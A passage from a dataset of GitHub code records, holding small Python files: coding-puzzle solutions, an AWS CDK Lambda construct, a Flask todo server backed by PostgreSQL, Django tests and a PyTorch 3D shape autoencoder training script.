'\n@app.route('/')\ndef read_sqlite_table():\n # items=db1.operators('read_tables')\n # return render_template('mainpage.html',items=items) \n items=db1.operators('read_tables')\n dateStr = db1.dateStr\n if(items != None):\n if(len(items)>20): \n return render_template('mainpage.html',items=items, dateStr=dateStr)\n else:\n return message\n else:\n return message\n#$env:FLASK_APP = \"run.py\"","repo_name":"shadevil/atmo_parser","sub_path":"old parser/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878829928","text":"#link : https://codeforces.com/problemset/problem/879/A\n#author : Mohamed Ibrahim\n\nn=int(input())\nx=0\nfor i in range(n):\n s,d=map(int,input().split())\n if s>x:\n x=s\n else:\n x=x-(x-s)%d+d\nprint(x)\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"CodeForces/A. Borya's Diagnosis.py","file_name":"A. Borya's Diagnosis.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"38795539052","text":"class Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n v1 = version1.split(\".\")\n v2 = version2.split(\".\")\n len1, len2 = len(v1), len(v2)\n m = abs(len1 - len2)\n if len1 > len2:\n v2 += [0] * m\n elif len1 < len2:\n v1 += [0] * m\n for i in range(len(v1)):\n x = int(v1[i])\n y = int(v2[i])\n if x > y:\n return 1\n elif x < y:\n return -1\n return 0\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/101-200/165-比较版本号.py","file_name":"165-比较版本号.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32173775869","text":"import os\nimport sys\nimport shutil\n\nfrom constructs import Construct\nfrom aws_cdk import (\n aws_iam as iam,\n aws_lambda as _lambda,\n)\n\nclass ContactLambda(Construct):\n\n @property\n def contact_lambda(self):\n return self._contact_lambda\n\n def __init__(self, scope: Construct, id: str, account: str, region: str, **kwargs):\n super().__init__(scope, id, **kwargs)\n\n # IAM role for the lambda function\n lambdaRole = iam.Role(\n self, \"AWSomeContactRole\",\n assumed_by=iam.ServicePrincipal(\"lambda.amazonaws.com\")\n )\n lambdaRole.add_to_policy(iam.PolicyStatement(\n actions=[\"logs:CreateLogGroup\"],\n resources=[f\"arn:aws:logs:{region}:{account}:*\"],\n ))\n lambdaRole.add_to_policy(\n iam.PolicyStatement(\n actions=[\n \"logs:CreateLogStream\",\n \"logs:PutLogEvents\",\n ],\n resources=[\n f\"arn:aws:logs:{region}:{account}:log-group:/aws/lambda/AWSomeStack*:*\",\n f\"arn:aws:logs:{region}:{account}:log-group:/aws/lambda/Deploy-AWSomeStack*:*\",\n ],\n ),\n )\n lambdaRole.add_to_policy(\n iam.PolicyStatement(\n actions=[\n \"ssm:GetParameter\",\n \"ssm:GetParameters\",\n \"ssm:ListTagsForResource\",\n ],\n resources=[f\"arn:aws:ssm:{region}:{account}:parameter/freelance/*\"],\n ),\n )\n lambdaRole.add_to_policy(\n iam.PolicyStatement(\n actions=[\n \"ses:SendEmail\",\n \"ses:SendRawEmail\",\n ],\n resources=[\"*\"],\n ),\n )\n\n if \"pytest\" in sys.modules:\n # Create dummy file for tests\n zip_file = '../contact/contact.zip'\n os.system('touch ' + zip_file)\n else:\n # Compile Go project\n os.system('cd ../contact && GOOS=linux GOARCH=amd64 go build .')\n # Compress binary\n zip_file = shutil.make_archive('../contact/contact', 'zip', '../contact', 'contact')\n\n # Lambda function\n cwd = os.getcwd()\n self._contact_lambda = _lambda.Function(\n self, \"AWSomeContactLambda\",\n runtime=_lambda.Runtime.GO_1_X,\n code=_lambda.Code.from_asset(os.path.join(cwd, zip_file)),\n handler='contact',\n role=lambdaRole,\n )\n","repo_name":"awsome-expert/awsome-expert","sub_path":"cdk/awsome/awsome_stack/contact_lambda.py","file_name":"contact_lambda.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2754346081","text":"from rest_framework import serializers\n\nfrom TaskMan.models import Tasks\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n dead_line_date = serializers.DateField(format=None, input_formats=None)\n class Meta:\n model = Tasks\n fields = ('id', 'user', 'task', 'created_date', 'dead_line_date', 'is_completed')\n\n","repo_name":"ramchauhan/task_manager","sub_path":"TaskMan/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18086278195","text":"import abc\nimport argparse\nimport json\nimport re\nimport psycopg2\nfrom flask import (\n Flask,\n request,\n make_response,\n )\n\napp = Flask(__name__)\n\nclass TaskStore(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def add(self, summary, description):\n pass\n \n @abc.abstractmethod\n def get_task(self, task_id):\n pass\n\n @abc.abstractmethod\n def delete_task(self, task_id):\n pass\n\n @abc.abstractmethod\n def update_task(self, task_id, summary, description):\n pass\n\n @abc.abstractmethod\n def all_tasks(self):\n pass\n\nclass MemoryTaskStore(TaskStore):\n def __init__(self):\n self._init_store()\n\n def new_id(self):\n id = self._last_id\n self._last_id += 1\n return id\n\n def add(self, summary, description):\n task_id = self.new_id()\n task = {\n 'id': task_id,\n 'summary': summary,\n 'description': description,\n }\n self.tasks[task_id] = task\n return task_id\n\n def get_task(self, task_id):\n try:\n return self.tasks[task_id]\n except KeyError:\n return None\n\n def delete_task(self, task_id):\n try:\n del self.tasks[task_id]\n return True\n except KeyError:\n return False\n \n def update_task(self, task_id, summary, description):\n try:\n task = self.tasks[task_id]\n except KeyError:\n return False\n task['summary'] = summary\n task['description'] = description\n return True\n\n def all_tasks(self):\n return iter(self.tasks.values())\n\n def clear(self):\n cleared = len(self.tasks)\n self._init_store()\n return cleared\n\n def _init_store(self):\n self._last_id = 0\n self.tasks = {}\n \n\nclass DbTaskStore(TaskStore):\n def __init__(self):\n self.dsn = 'dbname=todoserver user=www-data'\n\n def add(self, summary, description):\n insert_stmt = 'INSERT INTO tasks (summary, description) VALUES (%s, %s) RETURNING id'\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(insert_stmt, (summary, description))\n task_id = cur.fetchone()[0]\n return task_id\n\n def get_task(self, task_id: int):\n cols = (\n 'id',\n 'summary',\n 'description',\n )\n select_stmt = 'select ' + ','.join(cols) + ' from tasks WHERE id = %s'\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(select_stmt, (task_id,))\n row = cur.fetchone()\n if row is None:\n return None\n return dict(zip(cols, row))\n\n def update_task(self, task_id, summary, description):\n fields = [\n summary,\n description,\n ]\n clauses = [\n 'summary = %s',\n 'description = %s',\n ]\n statement = 'UPDATE tasks SET ' + ', '.join(clauses) + ' WHERE id = %s'\n fields.append(task_id)\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(statement, fields)\n count = _update_count(cur.statusmessage)\n assert count in {0, 1}, count\n return count == 1\n \n def delete_task(self, task_id):\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute('DELETE FROM tasks WHERE id = %s', (task_id,))\n count = _delete_count(cur.statusmessage)\n assert count in {0, 1}, count\n return count == 1\n\n def all_tasks(self):\n cols = (\n 'id',\n 'summary',\n 'description',\n )\n select_stmt = 'select ' + ','.join(cols) + ' from tasks'\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(select_stmt)\n for row in cur:\n yield dict(zip(cols, row))\n\n def clear(self):\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute('DELETE FROM tasks')\n count = _delete_count(cur.statusmessage)\n return count\n\ndef _delete_count(statusmessage):\n match = re.match(r'DELETE (\\d+)$', statusmessage)\n assert match is not None, statusmessage\n return int(match.group(1))\n\ndef _update_count(statusmessage):\n match = re.match(r'UPDATE (\\d+)$', statusmessage)\n assert match is not None, statusmessage\n return int(match.group(1))\n\nDEFAULT_STORE = 'db'\nstore_types = {\n 'memory': MemoryTaskStore,\n 'db': DbTaskStore,\n}\nassert DEFAULT_STORE in store_types\nstore = store_types[DEFAULT_STORE]()\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', default=5000, type=int)\n parser.add_argument('--host', default='127.0.0.1', type=str)\n parser.add_argument('--store', default=DEFAULT_STORE, choices=store_types.keys(),\n help='storage backend')\n parser.add_argument('--debug', action='store_true', default=False)\n return parser.parse_args()\n\n\ndef init_store(store_type_name):\n global store\n store_type = store_types[store_type_name]\n store = store_type()\n \n@app.route('/tasks/', methods=['GET'])\ndef get_tasks():\n return json.dumps([\n {'id': task['id'], 'summary': task['summary']}\n for task in store.all_tasks()])\n\n@app.route('/tasks//', methods=['GET'])\ndef describe_task(task_id):\n task = store.get_task(task_id)\n if task is None:\n return make_response('', 404)\n return json.dumps(task)\n\n@app.route('/tasks/', methods=['POST'])\ndef add_task():\n data = request.get_json()\n task_id = store.add(data['summary'], data['description'])\n return make_response(json.dumps({'id': task_id}), 201)\n\n@app.route('/tasks/ALL/', methods=['DELETE'])\ndef wipe_tasks():\n deleted = store.clear()\n return make_response(json.dumps({'deleted': deleted}), 200)\n \n@app.route('/tasks//', methods=['DELETE'])\ndef task_done(task_id):\n did_exist = store.delete_task(task_id)\n if did_exist:\n return ''\n return make_response('', 404)\n\n@app.route('/tasks//', methods=['PUT'])\ndef update_task(task_id):\n data = request.get_json()\n did_update = store.update_task(task_id, data['summary'], data['description'])\n if did_update:\n return ''\n return make_response('', 404)\n\nif __name__ == '__main__':\n args = get_args()\n if args.store == 'memory':\n init_store(args.store)\n if args.debug:\n app.debug = True\n app.run(host=args.host, port=args.port)\n","repo_name":"redsymbol/todo-server","sub_path":"src/todoserver.py","file_name":"todoserver.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"10379748363","text":"from django.test import TestCase\nfrom question.models import Question,Choices,Topics,Embeds\nfrom datetime import datetime, date\n# Create your tests here.\n\nclass QuestionTestCase(TestCase):\n def setUp(self):\n topics = []\n topics.append(Topics(t_id=1, body=\"topic_1\"))\n \n choices = []\n choices.append(Choices(c_id=0, body=\"choice_1\", pos =\"NONE\", iscorrect=False))\n\n embeds=[]\n embeds.append(Embeds(e_id=0,body=\"embed_1\"))\n\n Question.objects.create(q_id= \"1\",\n body=\"test_question1_body\",\n parent=\"0\",\n ask_date= date(2007, 12, 5) ,\n topics = topics,\n embeds = embeds,\n choices = choices\n )\n\n def test_Question(self):\n \"\"\"test_Question\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n self.assertEqual(q.body, 'test_question1_body')\n self.assertEqual(q.parent, '0')\n self.assertEqual(q.ask_date, date(2007, 12, 5))\n self.assertEqual(q.topics[0].body, \"topic_1\" )\n self.assertEqual(q.embeds[0].body, \"embed_1\" )\n self.assertEqual(q.choices[0].body, \"choice_1\" )\n self.assertEqual(q.choices[0].c_id, 0 )\n self.assertEqual(q.choices[0].pos, \"NONE\" )\n self.assertEqual(q.choices[0].iscorrect, False )\n\n def test_updateParent(self):\n \"\"\"test_updateParent\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateParent(5)\n self.assertEqual(q.parent, 5)\n\n def test_updateAskDate(self):\n \"\"\"test_updateAskDate\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateAskDate(\"2020.1.1\")\n self.assertEqual(q.ask_date,\"2020.1.1\")\n\n def test_addEmbed(self):\n \"\"\"test_addEmbed\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.addEmbed(\"embed_2\")\n self.assertEqual(q.embeds[1].body, \"embed_2\")\n\n def test_addTopic(self):\n \"\"\"test_addTopic\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.addTopic(\"topic_2\")\n self.assertEqual(q.topics[1].body, \"topic_2\")\n\n def test_addChoice(self):\n \"\"\"test_addChoice\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.addChoice(\"choice_2\",str(True),\"START\")\n self.assertEqual(q.choices[1].body, \"choice_2\")\n self.assertEqual(q.choices[1].pos, \"START\")\n self.assertEqual(q.choices[1].iscorrect, True)\n\n def test_updateBody(self):\n \"\"\"test_updateBody\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateBody(\"body_2\")\n self.assertEqual(q.body, \"body_2\")\n\n def test_updateEmbed(self):\n \"\"\"test_updateEmbed\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateEmbed(0,\"embed_0\")\n self.assertEqual(q.embeds[0].body, \"embed_0\")\n\n def test_updateTopic(self):\n \"\"\"test_updateTopic\"\"\"\n\n q = Question.objects.get(q_id= \"1\")\n q.updateTopic(1,\"topic_0\")\n self.assertEqual(q.topics[0].body, \"topic_0\")\n\n def test_updateChoice(self):\n \"\"\"test_updateChoice\"\"\"\n\n q = Question.objects.get(q_id = \"1\")\n q.updateChoice(0, \"new_choice\", str(True), \"END\")\n self.assertEqual(q.choices[0].body, \"new_choice\")\n self.assertEqual(q.choices[0].pos, \"END\")\n self.assertEqual(q.choices[0].iscorrect, True)\n\n def test_delEmbed(self):\n \"\"\"test_delEmbed\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n q.delEmbed(0)\n self.assertEqual(q.embeds,[])\n\n def test_delTopic(self):\n \"\"\"test_delTopic\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n q.delTopic(1)\n self.assertEqual(q.topics,[])\n\n def test_delChoice(self):\n \"\"\"test_delChoice\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n q.delChoice(0)\n self.assertEqual(q.choices,[])\n\n def test_copyQuestion(self):\n \"\"\"test_copyQuestion\"\"\"\n\n q= Question.objects.get(q_id = \"1\")\n new_q = q.copyQuestion()\n self.assertEqual(new_q.body, 'test_question1_body')\n self.assertEqual(new_q.parent, '1')\n self.assertEqual(new_q.topics[0].body, \"topic_1\" )\n self.assertEqual(new_q.embeds[0].body, \"embed_1\" )\n self.assertEqual(new_q.choices[0].body, \"choice_1\" )\n self.assertEqual(new_q.choices[0].c_id, 0 )\n self.assertEqual(new_q.choices[0].pos, \"NONE\" )\n self.assertEqual(new_q.choices[0].iscorrect, False )","repo_name":"KYurtseven/METU_Homeworks","sub_path":"445 - Script/phase4/src/question/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20422034782","text":"import os\nimport os.path as osp\nimport logging\nimport argparse\nfrom tqdm import tqdm\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nimport numpy as np\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport torch\nfrom torch.optim import lr_scheduler\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\n\n\nfrom utils import helper\nfrom utils import visualization\n\nfrom networks import autoencoder\n\nfrom dataset import shapenet_dataset\n###################################### Experiment Utils########################################################\n\n\ndef experiment_name(args):\n\n from datetime import datetime\n\n tokens = [\"Autoencoder\", args.dataset_name, args.input_type, args.output_type, args.emb_dims, args.last_feature_transform]\n \n if args.categories != None:\n for i in args.categories:\n tokens.append(i)\n \n if args.num_sdf_points != 5000:\n tokens.append(args.num_sdf_points)\n \n tokens.append(args.seed)\n return \"_\".join(map(str, tokens))\n\ndef bool_flag(s):\n \"\"\"\n Parse boolean arguments from the command line.\n \"\"\"\n if s.lower() in FALSY_STRINGS:\n return False\n elif s.lower() in TRUTHY_STRINGS:\n return True\n else:\n raise argparse.ArgumentTypeError(\"invalid value for a boolean flag\")\n \ndef compute_iou(occ1, occ2):\n ''' Computes the Intersection over Union (IoU) value for two sets of\n occupancy values.\n Args:\n occ1 (tensor): first set of occupancy values\n occ2 (tensor): second set of occupancy values\n '''\n occ1 = np.asarray(occ1)\n occ2 = np.asarray(occ2)\n\n # Put all data in second dimension\n # Also works for 1-dimensional data\n if occ1.ndim >= 2:\n occ1 = occ1.reshape(occ1.shape[0], -1)\n if occ2.ndim >= 2:\n occ2 = occ2.reshape(occ2.shape[0], -1)\n\n # Convert to boolean values\n occ1 = (occ1 >= 0.5)\n occ2 = (occ2 >= 0.5)\n\n # Compute IOU\n area_union = (occ1 | occ2).astype(np.float32).sum(axis=-1)\n area_intersect = (occ1 & occ2).astype(np.float32).sum(axis=-1)\n\n iou = (area_intersect / area_union)\n\n return iou\n\n###################################### Experiment Utils########################################################\n\n############################################# data loader #################################################\n\ndef get_dataloader(args, split=\"train\"):\n \n if args.dataset_name == \"Shapenet\":\n pointcloud_field = shapenet_dataset.PointCloudField(\"pointcloud.npz\")\n points_field = shapenet_dataset.PointsField(\"points.npz\",unpackbits=True)\n voxel_fields = shapenet_dataset.VoxelsField(\"model.binvox\")\n\n fields = {}\n\n fields['pointcloud'] = pointcloud_field\n fields['points'] = points_field\n fields['voxels'] = voxel_fields\n\n if split == \"train\":\n dataset = shapenet_dataset.Shapes3dDataset(args.dataset_path, fields, split=split,\n categories=args.categories, no_except=True, transform=None, num_points=args.num_points, num_sdf_points=args.num_sdf_points, sampling_type=args.sampling_type)\n\n dataloader = DataLoader(dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, drop_last=True)\n total_shapes = len(dataset)\n else:\n dataset = shapenet_dataset.Shapes3dDataset(args.dataset_path, fields, split=split,\n categories=args.categories, no_except=True, transform=None, num_points=args.num_points, num_sdf_points=args.test_num_sdf_points, sampling_type=args.sampling_type)\n dataloader = DataLoader(dataset, batch_size=args.test_batch_size, shuffle=True, num_workers=args.num_workers, drop_last=False)\n total_shapes = len(dataset)\n return dataloader, total_shapes \n \n \n else:\n raise ValueError(\"Dataset name is not defined {}\".format(args.dataset_name))\n\n############################################# data loader #################################################\n\n\n############################## visualization #################################################\n\ndef visualization_model(model, args, test_dataloader, name_info):\n model.eval()\n test_loader = iter(test_dataloader)\n data = next(test_loader)\n \n \n if args.input_type == \"Voxel\":\n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n elif args.input_type == \"Pointcloud\":\n data_input = data['pc_org'].type(torch.FloatTensor).to(args.device).transpose(-1, 1)\n\n if args.output_type == \"Implicit\":\n voxel_32 = data['voxels'].type(torch.FloatTensor).to(args.device)\n voxel_size = 32\n shape = (voxel_size, voxel_size, voxel_size)\n p = 1.1 * visualization.make_3d_grid([-0.5] * 3, [+0.5] * 3, shape).type(torch.FloatTensor).to(args.device)\n query_points = p.expand(args.test_batch_size, *p.size())\n elif args.output_type == \"Pointcloud\":\n query_points = None\n gt = data['pc_org'].type(torch.FloatTensor).to(args.device) \n \n \n with torch.no_grad():\n pred, decoder_embs = model(data_input, query_points)\n \n if name_info is not None:\n save_loc = args.vis_dir + \"/\" + str(name_info) + \"_\" \n else:\n save_loc = args.vis_dir + \"/\"\n \n if args.output_type == \"Implicit\":\n voxels_out = (pred[0].view(voxel_size, voxel_size, voxel_size) > args.threshold).detach().cpu().numpy()\n real = voxel_32[0].detach().cpu().numpy()\n visualization.multiple_plot_voxel([real, voxels_out], save_loc=save_loc + \"real_pred.png\")\n #visualization.save_mesh(voxels_out, out_file=save_loc + \"pred.obj\")\n elif args.output_type == \"Pointcloud\":\n visualization.plot_real_pred(gt.detach().cpu().numpy(), pred.detach().cpu().numpy(), 1, save_loc=save_loc + \"real_pred.png\") \n \n############################## visualization #################################################\n \n############################## validation #################################################\n\ndef val_one_epoch_iou(model, args, test_dataloader, epoch):\n model.eval()\n loss_reconstruction = []\n points_voxels = visualization.make_3d_grid(\n (-0.5 + 1/64,) * 3, (0.5 - 1/64,) * 3, (32,) * 3).type(torch.FloatTensor).to(args.device)\n query_points = points_voxels.expand(args.test_batch_size, *points_voxels.size())\n \n with torch.no_grad():\n for data in test_dataloader:\n \n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n \n voxels_occ_np = (data['voxels'] >= 0.5).cpu().numpy() \n \n if args.test_batch_size != data_input.size(0):\n query_points = points_voxels.expand( data_input.size(0), *points_voxels.size())\n \n pred, _ = model(data_input, query_points)\n \n occ_hat_np = (pred >= args.threshold).cpu().numpy()\n \n iou_voxels = compute_iou(voxels_occ_np, occ_hat_np).mean()\n\n loss_reconstruction.append(iou_voxels.item())\n \n loss_reconstruction = np.asarray(loss_reconstruction)\n loss_reconstruction = np.mean(loss_reconstruction)\n logging.info(\"[Val] Epoch {} IOU Loss: {}\".format(epoch, loss_reconstruction))\n return loss_reconstruction \n\ndef val_one_epoch(model, args, test_dataloader, epoch):\n model.eval()\n loss_reconstruction = []\n\n with torch.no_grad():\n for data in test_dataloader:\n \n if args.input_type == \"Voxel\":\n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n elif args.input_type == \"Pointcloud\":\n data_input = data['pc_org'].type(torch.FloatTensor).to(args.device).transpose(-1, 1)\n\n if args.output_type == \"Implicit\":\n query_points, occ = data['points'], data['points.occ']\n query_points = query_points.type(torch.FloatTensor).to(args.device)\n occ = occ.type(torch.FloatTensor).to(args.device)\n gt = occ \n elif args.output_type == \"Pointcloud\":\n query_points = None\n gt = data['pc_org'].type(torch.FloatTensor).to(args.device) \n \n pred, _ = model(data_input, query_points)\n loss_reconstuct = model.reconstruction_loss(pred, gt)\n\n loss_reconstruction.append(loss_reconstuct.item())\n \n loss_reconstruction = np.asarray(loss_reconstruction)\n loss_reconstruction = np.mean(loss_reconstruction)\n logging.info(\"[Val] Epoch {} Loss: {}\".format(epoch, loss_reconstruction))\n return loss_reconstruction \n\n############################## validation #################################################\n\n############################## training #################################################\n\ndef train_one_epoch(model, args, train_dataloader, optimizer, scheduler, loss_meter, epoch):\n model.train()\n loss_reconstruction = [] \n iteration = 0\n for data in train_dataloader:\n iteration = iteration + 1\n optimizer.zero_grad()\n\n data_index = data['idx'].to(args.device)\n \n if args.input_type == \"Voxel\":\n data_input = data['voxels'].type(torch.FloatTensor).to(args.device)\n elif args.input_type == \"Pointcloud\":\n data_input = data['pc_org'].type(torch.FloatTensor).to(args.device).transpose(-1, 1)\n \n if args.output_type == \"Implicit\":\n query_points, occ = data['points'], data['points.occ']\n query_points = query_points.type(torch.FloatTensor).to(args.device)\n occ = occ.type(torch.FloatTensor).to(args.device)\n gt = occ \n elif args.output_type == \"Pointcloud\":\n query_points = None\n gt = data['pc_org'].type(torch.FloatTensor).to(args.device) \n \n pred, shape_embs = model(data_input, query_points)\n\n loss_reconstuct = model.reconstruction_loss(pred, gt)\n \n loss = loss_reconstuct \n loss.backward()\n optimizer.step()\n loss_meter.update(loss, data_input.size(0))\n \n loss_reconstruction.append(loss_reconstuct.item())\n \n if iteration % args.print_every == 0:\n avg_reconstruction_loss = np.mean(np.asarray(loss_reconstruction))\n \n logging.info(\"[Train] Epoch {}, Iteration {} loss: {}, recon loss: {}\".format(epoch, iteration, loss_meter.avg, avg_reconstruction_loss))\n\n############################## training ################################################# \n\ndef parsing(mode=\"args\"):\n parser = argparse.ArgumentParser()\n \n ### Sub Network details\n parser.add_argument(\"--input_type\", type=str, default='Voxel', help='What is the input representation')\n parser.add_argument(\"--output_type\", type=str, default='Implicit', help='What is the output representation')\n parser.add_argument(\"--encoder_type\", type=str, default='Voxel_Encoder_BN', help='what is the encoder')\n parser.add_argument(\"--decoder_type\", type=str, default='Occ_Simple_Decoder', help='what is the decoder')\n parser.add_argument('--emb_dims', type=int, default=128, help='Dimension of embedding')\n parser.add_argument('--last_feature_transform', type=str, default=\"add_noise\", help='add_noise or none')\n parser.add_argument('--reconstruct_loss_type', type=str, default=\"sum\", help='bce or sum (mse) or mean (mse)')\n parser.add_argument('--pc_dims', type=int, default=1024, help='Dimension of embedding')\n \n ### Dataset details\n parser.add_argument('--dataset_path', type=str, default=None, help='Dataset path')\n parser.add_argument('--dataset_name', type=str, default=\"Shapenet\", help='Dataset path')\n parser.add_argument(\"--num_points\", type=int, default=2025, help='Number of points')\n parser.add_argument(\"--num_sdf_points\", type=int, default=5000, help='Number of points')\n parser.add_argument(\"--test_num_sdf_points\", type=int, default=30000, help='Number of points')\n parser.add_argument('--categories', nargs='+', default=None, metavar='N')\n parser.add_argument(\"--num_workers\", type=int, default=4, help='Number of workers') \n \n ### training details\n parser.add_argument('--train_mode', type=str, default=\"train\", help='train or test')\n parser.add_argument('--seed', type=int, default=1, help='Seed')\n parser.add_argument('--epochs', type=int, default=300, help=\"Total epochs\")\n parser.add_argument('--checkpoint', type=str, default=None, help=\"Checkpoint to load\")\n parser.add_argument('--use_timestamp', action='store_true', help='Whether to use timestamp in dump files')\n parser.add_argument('--num_iterations', type=int, default=300000, help='How long the training shoulf go on') \n parser.add_argument('--gpu', nargs='+' , default=\"0\", help='GPU list')\n parser.add_argument('--optimizer', type=str, choices=('SGD', 'Adam'), default='Adam')\n parser.add_argument('--lr', type=float, default=None)\n parser.add_argument('--batch_size', type=int, default=32, help='Dimension of embedding')\n parser.add_argument('--test_batch_size', type=int, default=32, help='Dimension of embedding')\n parser.add_argument('--threshold', type=float, default=0.05, help='Threshold for voxel stuff')\n parser.add_argument('--sampling_type', type=str, default=None, help='what sampling type: None--> Uniform')\n \n ### Logging details \n parser.add_argument('--print_every', type=int, default=50, help='Printing the loss every')\n parser.add_argument('--save_every', type=int, default=50, help='Saving the model every')\n parser.add_argument('--validation_every', type=int, default=5000, help='validation set every')\n parser.add_argument('--visualization_every', type=int, default=10, help='visualization of the results every')\n parser.add_argument(\"--log-level\", type=str, choices=('info', 'warn', 'error'), default='info')\n parser.add_argument('--experiment_type', type=str, default=\"max\", help='experiment type')\n parser.add_argument('--experiment_every', type=int, default=5, help='experiment every ')\n \n if mode == \"args\":\n args = parser.parse_args()\n return args\n else:\n return parser\n\n\ndef main():\n args = parsing()\n exp_name = experiment_name(args)\n \n manualSeed = args.seed\n helper.set_seed(manualSeed)\n\n # Create directories for checkpoints and logging\n args.experiment_dir = osp.join('exps', exp_name)\n args.checkpoint_dir = osp.join('exps', exp_name, 'checkpoints')\n args.vis_dir = osp.join('exps', exp_name, 'vis_dir') + \"/\"\n args.generate_dir = osp.join('exps', exp_name, 'generate_dir') + \"/\" \n \n \n if args.train_mode != \"test\":\n log_filename = osp.join('exps', exp_name, 'log.txt')\n helper.create_dir(args.experiment_dir)\n helper.create_dir(args.checkpoint_dir)\n helper.create_dir(args.vis_dir)\n helper.create_dir(args.generate_dir)\n helper.setup_logging(log_filename, args.log_level, 'w')\n else:\n test_log_filename = osp.join('exps', exp_name, 'test_log.txt')\n helper.setup_logging(test_log_filename, args.log_level, 'w')\n args.examplar_generate_dir = osp.join('exps', exp_name, 'exam_generate_dir') + \"/\" \n helper.create_dir(args.examplar_generate_dir)\n args.vis_gen_dir = osp.join('exps', exp_name, 'vis_gen_dir') + \"/\" \n helper.create_dir(args.vis_gen_dir)\n \n \n \n logging.info(\"Experiment name: {}\".format(exp_name))\n logging.info(\"{}\".format(args))\n\n device, gpu_array = helper.get_device(args)\n args.device = device \n \n logging.info(\"#############################\")\n train_dataloader, total_shapes = get_dataloader(args, split=\"train\")\n args.total_shapes = total_shapes\n logging.info(\"Train Dataset size: {}\".format(total_shapes))\n test_dataloader, total_shapes_test = get_dataloader(args, split=\"val\")\n logging.info(\"Test Dataset size: {}\".format(total_shapes_test))\n logging.info(\"#############################\")\n \n #####\n net = autoencoder.get_model(args).to(args.device)\n print(net)\n logging.info(\"#############################\")\n \n if args.train_mode == \"test\":\n print(\"Test mode \")\n print(\"Loading model....\", args.checkpoint)\n checkpoint = torch.load(args.checkpoint_dir +\"/\"+ args.checkpoint +\".pt\")\n net.load_state_dict(checkpoint['model'])\n\n full_test_dataloader, total_shapes_test = get_dataloader(args, split=\"test\")\n logging.info(\"Test Dataset size: {}\".format(total_shapes_test))\n \n if args.output_type == \"Implicit\":\n test_iou = val_one_epoch_iou(net, args, full_test_dataloader, 0)\n logging.info(\"Test iou {}\".format(test_iou))\n elif args.output_type == \"Pointcloud\":\n test_val = val_one_epoch(net, args, full_test_dataloader, 0)\n logging.info(\"Test val loss {}\".format(test_val))\n \n else:\n optimizer = helper.get_optimizer_model(args.optimizer, net, lr=args.lr)\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, args.num_iterations, 0.000001)\n\n start_epoch = 0 \n if args.checkpoint != None:\n print(\"Loading model....\", args.checkpoint)\n checkpoint = torch.load(args.checkpoint_dir +\"/\"+ args.checkpoint +\".pt\")\n net.load_state_dict(checkpoint['model'])\n\n optimizer.load_state_dict(checkpoint['optimizer'])\n scheduler.load_state_dict(checkpoint['scheduler'])\n start_epoch = checkpoint['current_epoch']\n \n\n best_loss = 100000 \n best_iou = 0\n best_32_loss = 100000\n\n for epoch in range(start_epoch, args.epochs):\n loss_meter = helper.AverageMeter()\n logging.info(\"#############################\")\n #val_iou = val_one_epoch_iou(net, args, test_dataloader, epoch)\n train_one_epoch(net, args, train_dataloader, optimizer, scheduler, loss_meter, epoch)\n \n if (epoch + 1) % 5 == True:\n visualization_model(net, args, test_dataloader, epoch)\n \n if args.output_type == \"Implicit\":\n val_iou = val_one_epoch_iou(net, args, test_dataloader, epoch)\n if best_iou < val_iou:\n best_iou = val_iou\n filename = '{}.pt'.format(\"best_iou\")\n logging.info(\"Saving Model........{}\".format(filename))\n helper.save_checkpoint(osp.join(args.checkpoint_dir, filename), net, args, optimizer, scheduler, epoch)\n elif 